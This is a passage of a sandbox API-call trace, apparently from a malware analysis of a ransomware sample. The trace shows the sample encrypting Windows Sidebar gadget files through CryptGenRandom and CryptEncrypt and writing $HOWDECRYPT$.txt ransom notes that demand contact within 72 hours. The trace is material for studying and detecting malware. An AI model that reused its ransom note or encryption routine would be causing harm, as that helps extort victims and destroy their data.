pbData=0x31f098*, pdwDataLen=0x57e8f0*=0x30) returned 1 [0160.902] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_down.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.906] GetProcessHeap () returned 0x2c0000 [0160.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.906] GetProcessHeap () returned 0x2c0000 [0160.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb19b8 | out: hHeap=0x2c0000) returned 1 [0160.906] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e8f0 | out: pbBuffer=0x57e8f0) returned 1 [0160.906] GetProcessHeap () returned 0x2c0000 [0160.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.906] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e8e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e8e8*=0x30) returned 1 [0160.906] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\bg_sidebar.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\in_sidebar\\bg_sidebar.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.919] GetProcessHeap () returned 0x2c0000 [0160.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.919] GetProcessHeap () returned 0x2c0000 [0160.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3dc78 | out: hHeap=0x2c0000) returned 1 [0160.919] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e8f0 | out: pbBuffer=0x57e8f0) returned 1 [0160.919] GetProcessHeap () returned 0x2c0000 [0160.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.920] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e8e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e8e8*=0x30) returned 1 [0160.920] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\settings.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\settings.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.940] GetProcessHeap () returned 0x2c0000 [0160.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.940] GetProcessHeap () returned 0x2c0000 [0160.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3c370 | out: hHeap=0x2c0000) returned 1 [0160.940] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e8e8 | out: pbBuffer=0x57e8e8) returned 1 [0160.940] GetProcessHeap () returned 0x2c0000 [0160.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.940] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e8e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e8e0*=0x30) returned 1 [0160.940] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\settings.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\css\\settings.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.945] GetProcessHeap () returned 0x2c0000 [0160.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.945] GetProcessHeap () returned 0x2c0000 [0160.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb14b8 | out: hHeap=0x2c0000) returned 1 [0160.945] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e8e8 | out: pbBuffer=0x57e8e8) returned 1 [0160.945] GetProcessHeap () returned 0x2c0000 [0160.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.945] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e8e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e8e0*=0x30) returned 1 [0160.945] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\logo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.978] GetProcessHeap () returned 0x2c0000 [0160.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.978] GetProcessHeap () returned 0x2c0000 [0160.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb2e18 | out: hHeap=0x2c0000) returned 1 [0160.978] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e8e0 | out: pbBuffer=0x57e8e0) returned 1 [0160.978] GetProcessHeap () returned 0x2c0000 [0160.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.978] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e8d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e8d8*=0x30) returned 1 [0160.978] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_floating.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rss_headline_glow_floating.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.987] GetProcessHeap () returned 0x2c0000 [0160.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.987] GetProcessHeap () returned 0x2c0000 [0160.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c83448 | out: hHeap=0x2c0000) returned 1 [0160.987] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e8e0 | out: pbBuffer=0x57e8e0) returned 1 [0160.987] GetProcessHeap () returned 0x2c0000 [0160.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.987] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e8d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e8d8*=0x30) returned 1 [0160.987] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_flyout.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_flyout.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.993] GetProcessHeap () returned 0x2c0000 [0160.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.993] GetProcessHeap () returned 0x2c0000 [0160.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f40e30 | out: hHeap=0x2c0000) returned 1 [0160.993] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e8d8 | out: pbBuffer=0x57e8d8) returned 1 [0160.993] GetProcessHeap () returned 0x2c0000 [0160.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.993] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e8d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e8d0*=0x30) returned 1 [0160.994] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttonup_on.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.998] GetProcessHeap () returned 0x2c0000 [0160.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.998] GetProcessHeap () returned 0x2c0000 [0160.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb11b8 | out: hHeap=0x2c0000) returned 1 [0160.998] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e8d8 | out: pbBuffer=0x57e8d8) returned 1 [0160.998] GetProcessHeap () returned 0x2c0000 [0160.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.998] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e8d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e8d0*=0x30) returned 1 [0160.998] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\16-on-black.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.002] GetProcessHeap () returned 0x2c0000 [0161.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.002] GetProcessHeap () returned 0x2c0000 [0161.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb0eb8 | out: hHeap=0x2c0000) returned 1 [0161.002] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\js\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0161.022] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0161.022] WriteFile (in: hFile=0x178, lpBuffer=0x57e807*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e930, lpOverlapped=0x0 | out: lpBuffer=0x57e807*, lpNumberOfBytesWritten=0x57e930*=0x127, lpOverlapped=0x0) returned 1 [0161.023] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0161.023] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e930, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e930*=0x2ac, lpOverlapped=0x0) returned 1 [0161.023] CloseHandle (hObject=0x178) returned 1 [0161.023] GetProcessHeap () returned 0x2c0000 [0161.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c89ea8 | out: hHeap=0x2c0000) returned 1 [0161.023] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0161.065] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0161.065] WriteFile (in: hFile=0x178, lpBuffer=0x57e803*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e92c, lpOverlapped=0x0 | out: lpBuffer=0x57e803*, lpNumberOfBytesWritten=0x57e92c*=0x127, lpOverlapped=0x0) returned 1 [0161.066] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0161.066] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e92c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e92c*=0x2ac, lpOverlapped=0x0) returned 1 [0161.066] CloseHandle (hObject=0x178) returned 1 [0161.066] GetProcessHeap () returned 0x2c0000 [0161.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c89c98 | out: hHeap=0x2c0000) returned 1 [0161.066] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e8c8 | out: pbBuffer=0x57e8c8) returned 1 [0161.066] GetProcessHeap () returned 0x2c0000 [0161.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.067] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e8c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e8c0*=0x30) returned 1 [0161.067] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\shuffle_over.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.071] GetProcessHeap () returned 0x2c0000 [0161.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.071] GetProcessHeap () returned 0x2c0000 [0161.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c89770 | out: hHeap=0x2c0000) returned 1 [0161.071] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e8c8 | out: pbBuffer=0x57e8c8) returned 1 [0161.071] GetProcessHeap () returned 0x2c0000 [0161.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.071] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e8c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e8c0*=0x30) returned 1 [0161.071] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_pressed.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_pressed.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.119] GetProcessHeap () returned 0x2c0000 [0161.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.119] GetProcessHeap () returned 0x2c0000 [0161.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c83320 | out: hHeap=0x2c0000) returned 1 [0161.119] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e8c0 | out: pbBuffer=0x57e8c0) returned 1 [0161.119] GetProcessHeap () returned 0x2c0000 [0161.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.119] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e8b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e8b8*=0x30) returned 1 [0161.119] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_hover.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_hover.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.249] GetProcessHeap () returned 0x2c0000 [0161.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.249] GetProcessHeap () returned 0x2c0000 [0161.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3d188 | out: hHeap=0x2c0000) returned 1 [0161.249] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e8c0 | out: pbBuffer=0x57e8c0) returned 1 [0161.249] GetProcessHeap () returned 0x2c0000 [0161.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.249] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e8b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e8b8*=0x30) returned 1 [0161.250] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_divider.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.260] GetProcessHeap () returned 0x2c0000 [0161.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.260] GetProcessHeap () returned 0x2c0000 [0161.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3d070 | out: hHeap=0x2c0000) returned 1 [0161.260] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e8b8 | out: pbBuffer=0x57e8b8) returned 1 [0161.260] GetProcessHeap () returned 0x2c0000 [0161.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.260] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e8b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e8b0*=0x30) returned 1 [0161.260] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_bottom_left.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_bottom_left.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.264] GetProcessHeap () returned 0x2c0000 [0161.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.264] GetProcessHeap () returned 0x2c0000 [0161.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c828b8 | out: hHeap=0x2c0000) returned 1 [0161.264] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e8b8 | out: pbBuffer=0x57e8b8) returned 1 [0161.264] GetProcessHeap () returned 0x2c0000 [0161.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.264] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e8b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e8b0*=0x30) returned 1 [0161.264] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_divider_right.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_divider_right.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.267] GetProcessHeap () returned 0x2c0000 [0161.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.268] GetProcessHeap () returned 0x2c0000 [0161.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c82790 | out: hHeap=0x2c0000) returned 1 [0161.268] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e8b0 | out: pbBuffer=0x57e8b0) returned 1 [0161.268] GetProcessHeap () returned 0x2c0000 [0161.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.268] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e8a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e8a8*=0x30) returned 1 [0161.268] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\hint_over.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.271] GetProcessHeap () returned 0x2c0000 [0161.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.271] GetProcessHeap () returned 0x2c0000 [0161.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c89458 | out: hHeap=0x2c0000) returned 1 [0161.272] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e8b0 | out: pbBuffer=0x57e8b0) returned 1 [0161.272] GetProcessHeap () returned 0x2c0000 [0161.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.272] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e8a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e8a8*=0x30) returned 1 [0161.272] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\background.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.274] GetProcessHeap () returned 0x2c0000 [0161.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.274] GetProcessHeap () returned 0x2c0000 [0161.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c89248 | out: hHeap=0x2c0000) returned 1 [0161.275] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e8a8 | out: pbBuffer=0x57e8a8) returned 1 [0161.275] GetProcessHeap () returned 0x2c0000 [0161.275] 